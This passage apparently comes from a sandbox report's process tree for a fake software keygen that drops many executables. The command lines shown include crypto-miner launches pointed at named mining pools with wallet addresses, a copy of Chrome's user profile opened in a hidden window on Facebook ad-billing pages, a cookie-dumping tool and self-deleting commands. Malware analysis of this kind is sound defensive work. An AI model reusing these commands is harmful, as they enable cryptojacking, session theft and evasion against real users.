                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=964 /prefetch:2
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:1724
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                            1⤵
                                                                                                                              PID:2756
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                              1⤵
                                                                                                                                PID:2608
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2576
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                1⤵
                                                                                                                                  PID:1376
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                  1⤵
                                                                                                                                    PID:1180
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:1096
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                      1⤵
                                                                                                                                        PID:68
                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                        1⤵
                                                                                                                                          PID:340
                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • Modifies registry class
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:692
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                            2⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:4660
                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:5936
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe"
                                                                                                                                            1⤵
                                                                                                                                              PID:6000
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                                2⤵
                                                                                                                                                  PID:6120
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                    keygen-pr.exe -p83fsase3Ge
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:2280
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5264
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4288
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                      keygen-step-1.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5168
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                      keygen-step-2.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                      PID:4356
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\240E.tmp.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\240E.tmp.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:5300
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\240E.tmp.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:3508
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                                                              6⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:4732
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1404
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                              5⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:5352
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                          keygen-step-3.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4536
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4192
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:4260
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                            keygen-step-4.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4548
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\qiangli-game.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\qiangli-game.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:3804
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                5⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:4412
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2264
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2C8A.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2C8A.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:5416
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2C8A.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2C8A.tmp.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:5532
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2EED.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2EED.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:5424
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w23198 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:2068
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w29763@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5492
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2224
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:5752
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops Chrome extension
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:4324
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:3020
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:5792
                                                                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                      xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      PID:5872
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      PID:6108
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffbafb54f50,0x7ffbafb54f60,0x7ffbafb54f70
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:6084
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1440,15050811271420061026,2374434050724751111,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1904 /prefetch:8
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:5032
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1440,15050811271420061026,2374434050724751111,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1508 /prefetch:2
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:5068
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1440,15050811271420061026,2374434050724751111,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2124 /prefetch:8
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5060
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,15050811271420061026,2374434050724751111,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:4716
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,15050811271420061026,2374434050724751111,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:5064
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,15050811271420061026,2374434050724751111,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:5024
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,15050811271420061026,2374434050724751111,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4372
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,15050811271420061026,2374434050724751111,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:5996
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,15050811271420061026,2374434050724751111,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:4848
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      PID:5284
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:1332
                                                                                                                                                                                      • C:\ProgramData\7376276.exe
                                                                                                                                                                                        "C:\ProgramData\7376276.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:848
                                                                                                                                                                                      • C:\ProgramData\1108239.exe
                                                                                                                                                                                        "C:\ProgramData\1108239.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:664
                                                                                                                                                                                        • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                          "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:3812
                                                                                                                                                                                      • C:\ProgramData\6719328.exe
                                                                                                                                                                                        "C:\ProgramData\6719328.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:3492
                                                                                                                                                                                        • C:\ProgramData\6719328.exe
                                                                                                                                                                                          "{path}"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5984
                                                                                                                                                                                      • C:\ProgramData\6846791.exe
                                                                                                                                                                                        "C:\ProgramData\6846791.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:4480
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                      PID:5656
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5972
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:3756
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:6020
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4984
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe"
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:768
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5340
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
                                                                                                                                                                                        keygen-pr.exe -p83fsase3Ge
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5232
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5160
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5652
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
                                                                                                                                                                                          keygen-step-1.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5312
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe
                                                                                                                                                                                          keygen-step-2.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5412
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1748.tmp.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1748.tmp.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3020
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe" >> NUL
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:4376
                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:2104
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe
                                                                                                                                                                                            keygen-step-3.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4308
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:2228
                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                  PID:3664
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
                                                                                                                                                                                              keygen-step-4.exe
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:5352
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX5\qiangli-game.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX5\qiangli-game.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:4132
                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:2800
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:4592
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\30CB.tmp.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\30CB.tmp.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:4352
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\30CB.tmp.exe
